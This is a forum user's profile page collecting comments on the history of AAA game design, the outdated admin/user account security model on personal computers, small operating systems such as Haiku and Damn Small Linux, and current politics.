• 1 Post
  • 239 Comments
Joined 1 year ago
cake
Cake day: May 29th, 2024

help-circle


  • So, when I mention the Assassin’s Creed / Far Cry / GTA triangle I really mean to say the poor imitators of those games. They did do some very innovative things when they first came out, but just like modern military shooters took regenerating health and the two weapon limit from Halo while leaving behind all the other gameplay mechanics that made that work, so too did many games adopt the open world and the general way you interact with it, while removing anything interesting. By “the way you interact with it” I’m referring specifically to the map unlocking, the collectables, the village / territory faction control, and the “heat” system that spawns enemies depending on how much attention you are generating.

    IMO those sorts of games were very much the other side of the coin from CoD-likes, and the problem was that while the extremely linear levels of CoD-likes were too restrictive, these open world games had no structure at all. In games like Blood, Quake, or what have you, encounters are designed to flow in a certain way, with each one having its own flavor and favoring certain approaches over others. In some games you can even think of enemy encounters as a puzzle you need to solve. Level design and enemy placement of course form the two halves of encounter design. In good games this sort of thing extends to the structure of the game as a whole, with the ebs and flows in the action, and different gameplay happening in different sections so the formula keeps getting changed up. But in games where the level design is an open world that let’s you approach from any angle, and where enemy placement is determined on the fly by a mindless algorithm, there is no encounter design. At the same time the way enemy spawning works is actually too orchestrated to have interesting emergent gameplay. For example, if an algorithm made an enemy patrol spawn an hour ago, and the player can see it from across the map, they can come up with their own plan on how to deal with this unique situation. If the player gets one bar of heat and the algorithm makes an enemy spawn around a corner they can’t anticipate that at all, its just mindless. This has implications for the gameplay itself (no enemy can be very tough or require very much thinking or planning if you’re just going to spawn them around a corner) but also, as previously stated, the entire structure of the game.

    As for the other games you mention, I want to bring up Bioshock in particular. Its true, that game is a master class in presentation and aesthetics, and a game I would highly recommend, but its actually one of the games that I remember people complaining about when they said gaming was better in the 90s. Specifically the way Bioshock is very dumbed down compared to its predecessor System Shock, both from a general game and level design standpoint, but also because of the inclusion of vita chambers and the compass pointer that leads you around by the nose. (One place I will give Bioshock points though is that it has way more of an ecosystem than most imm-sims with the way enemies interact with each other; it even beats out imm-sim darling Prey 2017 in this regard).

    This is admittedly a way more niche complaint than people complaining about QTEs or games being piss/brown, but it was definitely a smaller part of the much larger “games are getting dumbed down” discourse.

    I could talk about Crysis and Spore too, but this comment is already really long. I haven’t played the rest of the games you list, so I can’t offer an opinion on them, though I have heard that KOTOR was very good.



  • 20 years ago people were complaining about the same lack of creativity in the AAA scene, saying that gaming was better in the 90s. In fact I remember it was a common talking point that AAA gaming had gotten so bad that there would surely be another crash like the one in '83.

    Here’s how I see it:
    From a gameplay standpoint: My perception of the mid to late 2000s is that every AAA game was either a modern military shooter, a ‘superhero’ game (think prototype or infamous), or fell somewhere in the assassin’s creed, far cry, GTA triangle. Gameplay was also getting more and more trivial and braindead, with more and more QTE cuts scenes. The perception among both game devs and journalists was that this was a good direction for the industry to go, as it was getting away from the ‘coin sucking difficulty’ mentality of arcade games and moving towards games as art (i.e. cinematic experiences). There were of course a few games like Mirrors Edge, and games released by Valve, but they were definitely the exception rather than the rule (and Valve eventually stopped making games). Then Dark Souls came out and blew all their minds that a game could both have non-braindead gameplay and be artful at the same time.

    Now I would say we’ve actually seen a partial reversal of this trend. Triple A games are still not likely to be pioneers when it comes to gameplay, we’ve actually seen a few mainstream franchises do things like using Souls-like combat or immersive-sim elements, which IMO would have been unthinkable 15 years ago.

    From an aesthetic standpoint: My perception of the mid to late 2000s is that everything was brown with a yellow piss filter over it. If you were lucky it could be grey and desaturated instead. This was because Band of Brothers existed, and because it was the easiest way to make lighting look good with the way it worked at the time. As an aside, Dark Souls, a game where you crawl around in a sewer filled with poop and everyone is a zombie that’s also slowly dying of depression because the world is going to end soon and they’ve lost all hope, had more color than the average 2000s game where you’re some sort of hero or badass secret agent.

    Things are absolutely better in the aesthetic department now. Triple A studios remembered what colors looked like.

    From a conceptual / narrative standpoint: I don’t think AAA games were very creative in this department in the 2000s and I don’t think they’re very creative now. They mostly just competed to see who could fellate the player the hardest to make them feel like a badass. If you were lucky the player character was also self destructive and depressed in addition to being a badass.

    Then and now your best bet for a creative premise in a high budget game is to look to Japanese developers.

    From a consumer friendliness / monetization standpoint: In the 2000s people were already complaining about day one DLC, battlepasses and having to pay multiple times just to get a completed game.

    Now its worse than its ever been IMO. Not only do AAA games come out completely broken and unfinished, really aggressive monetization strategies are completely normalized. Also companies are pretty reluctant to make singleplayer games now, since its easier to farm infinite gacha rolls from a multiplayer game (although this was kinda already the case in the 2000s).

    Overall I think we’re now in a golden age for indie games, and things like Clair Obscura and Baldur’s Gate 3 give me a lot of hope for AA games.




  • Yeah, it doesn’t actually make much of a difference:

    Fundamentally the idea of having a separate admin account, which is completely protected, and a user account where everything can mingle together and see everything else, is a 1960s security model. It was originally created for a world where the owner of the computer and the user of the computer were two different people. In that world the user provides all the software that they want to run in their account (they probably wrote it) and the OS’s job is to protect the admin account from users and the users from each other.

    Fast forward to the present day and this security model is completely mismatched with the reality of a personal computer. The internet exists, the user and owner are the same person, and they’re probably not writing all their software themselves. A piece of malicious or compromised software can encrypt every file in your user folder, steal your browser history, your saved passwords, and (on xwindows) record your keystrokes and make your screen display anything it wants, all without privilege escalation. But you can rest assured knowing that the user account can’t violate any timeshare limits that the root account placed on it.

    The one thing you could argue is that a separate admin account makes it easier to detect and fix a compromised user account, but:

    1. Most people are not in the habit of regularly logging into their root account and examining all the processes that are running in their user account. In fact many distributions do not even have a separate root account.

    2. If you do think your computer has been compromised the sensible thing is to wipe the disk and restore from backup. It just doesn’t make any sense to fiddle around trying to figure out just how compromised you are and trying to reverse the process in a running system.

    3. If you’re running xwindows I hope you never install updates or type your password for any other reason while some malicious software is running, since, as previously stated, anything running under your account can record your keystrokes. In that case your admin account is compromised anyway without having to use any privilege escalation exploits. Can you see how all this stuff was built with the assumption that the user and owner are two separate people with two separate passwords?

    With Wayland and containerized applications we are slowly moving away from that 1960s security posture, which is something that’s long overdo. But currently something like Linux Mint is not really much better off than Haiku, from a pure security model standpoint.

    In any case its security model is not the interesting thing about Haiku.



  • Neither Haiku or 9front use systemd, and they’re both very interesting from a technical and design perspective (though not for their init systems).

    If it has to be a Linux distribution I would say Damn Small Linux (DSL), because its really impressive just how few resources it requires. You can run x windows and even browse the web (using Dillo) on a system that’s small enough to fit in the L3 cache of some modern CPUs.

    I don’t daily drive any of these though, so they might not count as my “favorite”.







  • This is a little bit like having AIDS, getting a flare-up, and then saying “well I’m glad at least something is happeing”.

    I understand the frustration at the general political ambivalence following “the end of history” in the 90s and the endless wars in the 2000s, but a flare-up isn’t going to make the aids go away. In the absolute best case impossible scenario where everything that’s been going on miraculously stops tomorrow we’re still locked into another 50+ years of consequences from this administration, just like we have problems decades afterwards that can be traced back to the Reagan administration.

    In a worse case scenario, well, let’s just say that neither Germany nor Italy today are particularly better off or highly progressive compared to their neighbors. Like I said, having a flare-up does not cure your AIDS.

    If someone has a counter example from history I would unironically genuinely love to hear it, because at this point I’ve given up hope of the world becoming a socially better place in my lifetime.







OSZAR »